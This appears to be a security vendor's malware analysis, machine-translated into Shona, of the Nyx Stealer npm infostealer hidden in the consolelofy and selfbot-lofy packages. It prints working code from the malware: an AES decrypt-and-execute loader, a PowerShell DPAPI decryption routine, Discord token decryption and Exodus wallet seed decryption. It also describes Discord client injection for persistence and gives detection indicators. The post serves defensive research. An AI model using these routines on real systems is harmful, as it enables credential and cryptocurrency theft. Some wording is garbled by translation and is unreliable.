npm Infostealer

Kuwanikwa kweInfostealer kutsva: Nyx ​​Stealer Hijacks Discord Sessions

TL; DR

Chikwata Chekutsvaga Kuchengetedzeka cheXygeni yakawana chirongwa che npm infostealer chakagadzirwa nenzira ine hutsinye kuburikidza nemapakeji maviri ane hutsinye: consolelofy uye selfbot-lofy.

Shanduro yazvino (consolelofy@1.3.0) inoisa 216KB AES-encrypted payload iyo inoburitsa zvinyorwa panguva yekumhanya uye inozviita kuburikidza vm.runInNewContext()Nekuti logic yakaipa yakavharidzirwa zvizere, ma static scanners anovimba ne string inspection haagone kuona maitiro ayo kusvika nguva yekuitwa kwayo yasvika.

Kana yangobviswa pacrypt, muripo wacho, une zita remukati Muba weNyx, zvinangwa:

  • Zviratidzo zveDiscord proof tokens
  • Zvitoro zvemabhurawuza zvinodarika makumi mashanu
  • Kuwedzerwa kwemari ye cryptocurrency kunopfuura makumi mapfumbamwe
  • Zvikamu zveRoblox, Instagram, Spotify, Steam, Telegram, uye TikTok
  • Kuenderera mberi kwemutengi wedesktop yeDiscord

Mavhezheni ese makumi maviri mumapakeji ese ari maviri akataurwa uye akasimbiswa kuti ane njodzi.

Ongororo yehunyanzvi yeiyi npm Infostealer

Kusiyana nemalware echinyakare anongoitika panguva yekuisa, chirongwa ichi chinoshandisa a runtimetime modhi yekubvisa manyorerwo.

Pane:

  • Hapana hutsinye preinstall or postinstall hooks
  • Hapana mafoni enetwork ari pachena panguva yekuisa
  • Hapana ruzivo rwekuunganidza humbowo hwemagwaro asina kujeka

Mutoro wepayload unoshanda kana module yapinzwa. Muviri wese une malware unovharwa uye unongoonekwa mundangariro panguva yekumhanya.

Dhizaini iyi inodzivirira kuonekwa panguva yekuisa package.

Maitiro Anoita Uyu npm Infostealer Chaizvo

Tisati taongorora zvinoba Nyx Stealer, tinofanira kunzwisisa kuti zvinoitwa sei.

Pfungwa yakaipa iri mukati meiyi npm infostealer inotevera maitiro akafanana:

Chishandiso chidiki chinobvisa zvinyorwa zvepayload yakakura yakavharidzirwa uye chinoishandisa nenzira inochinja-chinja mukati meNode.js VM context.

Dhizaini iyi ndeyemaune. Murwisi haasi kuvanza mashandiro ari kuseri kwekuvharika chete, asi ari kubvisa kodhi yakaipa kubva pakuonekwa kwestatic zvachose.

Muenzaniso weKuita wePamusoro-soro

Padanho repamusoro, chiputiro chinoita zvinhu zvina:

  • Inowana kiyi yeAES kubva pashoko rekushandisa rakanyorwa uchishandisa SHA-256
  • Inobvisa magwaro makuru ehex-encoded uchishandisa AES-256-CBC
  • Inoita JavaScript yakabviswa crypt uchishandisa vm.runInNewContext()
  • Inopa sandbox ichiri kuratidza zvinhu zvine simba zvenguva yekumhanya

Pfupiso yeMaitiro Epakati

chikamu Kugadziriswa / Kukosha
Algorithm AES-256-CBC
Key Derivation SHA-256 (password)
Vekitari Yekutanga (IV) Mabhaiti gumi nematanhatu e0x00
kuuraya vm.runInNewContext(yakabviswa crypt, sandbox)

Zvinoshamisa kuti bhokisi rejecha rinopfuura nepakati:

  • require
  • process
  • Buffer
  • nguva
  • kutumira kunze kwemodule

Izvi zvinoreva kuti mutoro wakabviswa pacrypted unoramba uine kugona kwakazara kwe:

  • Maitiro ekubvisa mbeu
  • Verenga uye nyora mafaira
  • Ita mafoni enetwork
  • Chinja maapplication emuno

Iyi haisi VM ine muganho. IVM inoshandiswa setrampoline yekuteedzera.

Runtime Encryption Pattern (Nzira yeKuita Core)

Chinotakurisa chidiki.
Muviri une utsinye hausi.

Pazasi pane maitiro ekuita anowanikwa mukati mepakeji:

const crypto = require('crypto'); const vm = require('vm');  function decryptAndExecute(encryptedHex, passphrase) {     const key = crypto.createHash('sha256')                       .update(passphrase)                       .digest();      const iv = Buffer.alloc(16, 0);      const decipher = crypto.createDecipheriv('aes-256-cbc', key, iv);     let decrypted = decipher.update(encryptedHex, 'hex', 'utf8');     decrypted += decipher.final('utf8');      const sandbox = {         require,         module,         exports,         console,         process,         Buffer,         __dirname,         __filename,         setTimeout,         setInterval,         clearTimeout,         clearInterval     };      vm.runInNewContext(decrypted, sandbox); }

Nei Izvi Zvichikosha

Mutoro wekubhadhara wakabviswa cryptic:

  • Izvozvo kwete iripo muchinyorwa chakajeka mukati mepakeji ye npm
  • Hazvionekwi kune zviri nyore grep kana kuongorora tambo isingachinji
  • Inongoonekwa chete mundangariro panguva yekumhanya
  • Inoita neNode runtime ability yakazara

Musanganiswa uyu weAES + VM chiratidzo chakasimba chemaitiro emunhu npm infostealer iri kuedza kunzvenga kuongororwa kwestatic.

Mune mamwe mazwi:

Kana ukaongorora panowanikwa mashoko ari pa package, hauoni munhu anoba.
Unoona decryptor.

Chii Chinoitika Mushure meKubvisa Kuvharwa Kwemashoko

Kana yangoitwa, Nyx Stealer inotanga mafungu ekuunganidza data akafanana.

Wave 1: Kubviswa kweZviratidzo zveBrowser

Marware:

  • Dhawunirodha nguva yekumhanya yePython kubva kuNuGet CDN
  • Kuisa maraibhurari e cryptographic
  • Zvinobviswa muzvitoro zvemazano zveChromium
  • Inobvisa zvakavanzika zvakachengetedzwa neDPAPI

Pane kuunganidza ma "native bindings", inoshandisa PowerShell kufonera Windows DPAPI zvakananga.

function dpapiUnprotectWithPowerShell(dataBuf) {     const b64 = dataBuf.toString('base64');      const ps =         "Add-Type -AssemblyName System.Security;" +         "$b=[Convert]::FromBase64String('" + b64 + "');" +         "$p=[System.Security.Cryptography.ProtectedData]::Unprotect(" +         "$b,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser);" +         "[Console]::Out.Write([Convert]::ToBase64String($p))";      const cmd =         `powershell -NoProfile -ExecutionPolicy Bypass -Command "${ps}"`;      return Buffer.from(execSync(cmd, { encoding: 'utf8' }).trim(), 'base64'); }

Iyi nzira:

  • Inodzivisa zvinhu zvakagadzirwa nemaoko
  • Inoshandisa maWindows crypto APIs emuno
  • Zvinosanganiswa mukushandisa maturusi ekutonga

Kubvisa ruzivo rweOS-level, kwete kukwenya.

Wave 2: Discord Token Decryption

Munhu anoba anoziva nezvemaitiro ehurongwa hwemashoko. Anonzwisisa fomati yeDiscord ye encrypted token.

function decryptToken(encryptedToken, key) {     const tokenParts = encryptedToken.split('dQw4w9WgXcQ:');     const encryptedData = Buffer.from(tokenParts[1], 'base64');      const iv = encryptedData.slice(3, 15);     const ciphertext = encryptedData.slice(15, -16);     const tag = encryptedData.slice(-16);      const decipher = crypto.createDecipheriv('aes-256-gcm', key, iv);     decipher.setAuthTag(tag);      return decipher.update(ciphertext).toString('utf8'); }

Kufamba kwekushanda:

  • Bvisa kiyi huru kubva kuDiscord's Local State
  • Bvisa kiyi huru kuburikidza neDPAPI
  • Bvisa madonhwe ematokeni eAES-GCM
  • Simbisa ma tokens uchienzanisa neDiscord API
  • Wedzera neNitro, mabheji, ruzivo rwekubhadhara

Uku hakusi kurasa ruzivo rwevanhu vose. Kutora chikamu chehurongwa hwemashoko nenzira dzinoenderana nemaitiro emunhu.

Wave 3: Kutarisa Wallet yeCryptocurrency

Iyo npm infostealer inotsanangura:

  • Kuwedzerwa kwewallet yebrowser kunopfuura makumi mapfumbamwe
  • Mawallet edesktop makumi maviri nemanomwe
  • Nzira dzechikwama chinotonhora
  • Mafaira embeu yeExodus

Muenzaniso wekuyedza kubvisa cryptography yembeu:

function decryptSeco(content, password) {     const key = crypto.pbkdf2Sync(password, 'exodus', 10000, 32, 'sha512');      const decipher = crypto.createDecipheriv(         'aes-256-gcm',         key,         content.slice(0, 12)     );      decipher.setAuthTag(content.slice(-16));      return Buffer.concat([         decipher.update(content.slice(12, -16)),         decipher.final()     ]).toString('utf8'); }

Kana zvikabudirira, kubvumirana kwemari yechikwereti kunoitika pakarepo uye hakuzogadzirisiki.

Izvi zvinoratidza kukosha kwemari muchirongwa ichi.

Kuramba uchishandisa Discord Desktop Injection

Mushure mekutora zvitupa, Nyx Stealer inoedza kuramba ichienderera mberi nekugadzirisa mamiriro emuno. Kurwisana nemhosva.

Target:

%LOCALAPPDATA%\Discord*\app-*\modules\discord_desktop_core\index.js

Operational Sequence

Muba infostealer anoita matanho anotevera:

  • Inogumisa mashandiro eDiscord
  • Inowana maDiscord akasiyana akaiswa (Stable, Canary, PTB)
  • Inobvisa discord_desktop_core/index.js
  • Inopinza pfungwa dzewebhook dzinodzorwa nevanorwisa
  • Inotangisazve Discord

Izvi zvinoita kuti zvikamu zveDiscord zvemangwana zviburitse otomatiki zviratidzo zvitsva zvekusimbisa.

Chinokosha ndechekuti, kuramba uchiita izvi hakuvimbi nemabasa akarongwa kana kugadziriswa kwerejistri. Kunoshandisa kugadzirisa kodhi yepurogiramu, nzira yakavanzika.

Kunyangwe kana pasuru yenpm yakaipa ikazobviswa gare gare, mutengi weDiscord anoramba akakanganiswa.

Kuenzanisa kwehunyanzvi: Selfbot yepamutemo vs npm Infostealer

chikamu Raibhurari Yepamutemo Nyx npm Infostealer
Encryption hapana Mutoro wakazara weAES-encrypted
VM Yenguva Yekushanda Kwete vm.runInNewContext kuurayiwa
Credential Access Discord API chete Browser, mawallet, DPAPI
Zvekunze Zvinodhawunirodhwa Aihwa Nguva yekumhanya yePython kuburikidza neNuGet
Kushivirira Aihwa Kupinza kwemutengi weDiscord
Mari Kuzviitira otomatiki kweBot Kutengesazve zvitupa

Rutivi rwekuvharidzira chete runotoparadzanisa mushandirapamwe uyu neforogo yakajairika ye open-source.

Boti reDiscord selfbot harina chikonzero chekuvharidzira codebase yaro yese, kutanga PowerShell kuti iwane DPAPI, kudhawunirodha nguva dzekunze, kana kugadzirisa maapplication epa desktop. Kana kugona ikoko kuchionekwa mukati memunhu anoti anoshandira Discord otomatiki, kusawirirana kwezvivakwa kunova kusingabviri kuregeredza.

Kubva pakuongorora, iyi npm infostealer inosiya zviratidzo zvakasiyana-siyana. Zvisinei, zviratidzo zvinonyanya kuvimbika hazvisi ma URL akaomeswa kana nzira dzemafaira chaiwo, sezvo izvozvo zvinogona kuchinja pakati pemavhezheni. Pane kudaro, zviratidzo zvinogara kwenguva refu zvine chimiro.

Padanho repakeji, mureza mutsvuku wakasimba ndeye musanganiswa wepayload hombe yakavharidzirwa uye wrapper yekudzima ruzivo rwekumhanya iyo inongoerekana yaitwa kuburikidza ne vm.runInNewContext()Kunyange hazvo encryption yoga isina kuipa, kushandisa AES decryption ichiteverwa ne dynamic VM execution mukati meDiscord utility package hazvina kunaka zvakanyanya.

Padanho remugamuchiri, maitiro anofungidzirwa anosanganisira chiitiko cheDPAPI chisingatarisirwi chekubvisa manyorerwo, kubuda kwemapurogiramu kubva paNode.js dependency context, uye kugadziriswa kwemafaira ekushandisa emunharaunda asingafanirwe kuchinjwa nemaraibhurari echitatu. Saizvozvowo, padanho renetwork, kutaurirana kwe outbound webhook-style kunotangwa ne dependency ye development kunomiririra chimwe chinhu chisina kujairika chine musoro.

Nemamwe mashoko, nzvimbo yekuona haisi chiratidzo chimwe chete chekubvumirana. Ndiko kuwirirana kwe encryption, runtime execution, credenti access, uye persistent behavior zvinoratidza njodzi.

Kuwanikwa uye Kudzikiswa kweXygeni

npm Infostealer

Uyu npm infostealer akaonekwa na Yambiro Yekutanga yeMalware yeXygeni (MEW) kuburikidza nekubatana kwemaitiro akasiyana-siyana pane kungofananidza zviratidzo.

Panzvimbo pekutsvaga ma string anozivikanwa ane njodzi, MEW inoongorora kusarongeka kwema structure mu source tree yese. Muchiitiko ichi, kuonekwa kwakabuda kubva pakubatana kwemasaini akati wandei: chirongwa chekubvisa ma AES mumodule entry point, kuita nekukurumidza mukati meVM context, uye kusawirirana kwakajeka kwekugona kuita chinangwa.

Chinokosha ndechekuti hapana chimwe chezviratidzo izvi chinongoratidza chinangwa chakaipa. Zvisinei, kana zvikaongororwa pamwe chete, zvinofumura kuedza kuvanza maitiro ekushanda. Maitiro aya anoderedza zvakanyanya kunaka kwenhema ukuwo zvichiratidza njodzi dzekutengesa zvinhu zvine chivimbo chakanyanya.

Uyezve, nyaya iyi inoratidza kuti nei kuongorora nguva yekuisa chete kusina kukwana. Pfungwa yakaipa haigari muma script ehupenyu hwese. Inoshanda chete mushure mekunge module yaiswa uye inozoonekwa chete kana yabviswa mundangariro. Saka, dziviriro inoshanda inoda ongororo inoziva nezvekuvharwa kwedata, kuzivikanwa kwemaitiro ekuita, uye kutarisa kuenderera mberi kwekuvimbana kupfuura zviitiko zvekuisa.

Kubviswa kweRegistry kuri kushanda. Kuongorora kweRuntime-aware inzira yekudzivirira.

Nei Iyi npm Infostealer Ichikosha

Nyx Stealer inomiririra kushanduka-shanduka kwechimiro mune malware yakavakirwa pa npm.

Kare, mapakeji mazhinji ane njodzi aivimba nema scripts anoonekwa panguva yekuisa kana ma endpoints echokwadi ekubvisa ma credential. Kusiyana neizvi, chirongwa ichi chinochengetedza mutoro waro, chinononotsa kushanda kusvika panguva yekushanda, chinoshandisa ma API epamutemo e operating system, uye chinosimbisa kugara kwenguva refu mukati memapurogiramu anovimbwa nawo.

Nekuda kweizvozvo, murwisi haafanire kushandisa npm infrastructure pachayo. Pane kudaro, kurwisa kunobudirira nekuti dependency installation zvinoreva kuvimbana. Vagadziri vanofunga kuti kupinza raibhurari ibasa rakachengeteka, kunyanya kana richizviratidza seforogo inogoneka yechishandiso chinozivikanwa.

Sezvo nharaunda dzichiramba dzichikura uye maforogo achiwanda, muganhu iwoyo wekuvimbana unova nzvimbo inokwezva yekurwisa. Nokudaro, kudzivirira kubva kune vanoba infosteal vemazuva ano vanoda kuziva mapatani ekuvaka pane kutsvaga tambo dzisingachinji.

Pakupedzisira, mushandirapamwe uyu unosimbisa chidzidzo chakakosha mu software supply chain security: njodzi dzine njodzi huru hadzisi idzo dzinoita sedzine njodzi pakutanga, asi idzo dzinoita sedzakakodzera kusvika nguva yekushanda yaratidza maitiro adzo chaiwo.

zvishandiso-zve-kuongorora-software-ye-sca-zvishandiso-zvekuongorora-kuumbwa
Isa zvinhu zvakakosha, gadzirisa, uye chengetedza njodzi dzesoftware yako
Tora Akaunti Yako Yemahara.
Hapana kiredhiti kadhi inodikanwa.

Chengetedza Kugadzirwa kweSoftware yako uye Kutumirwa

neXygeni Product Suite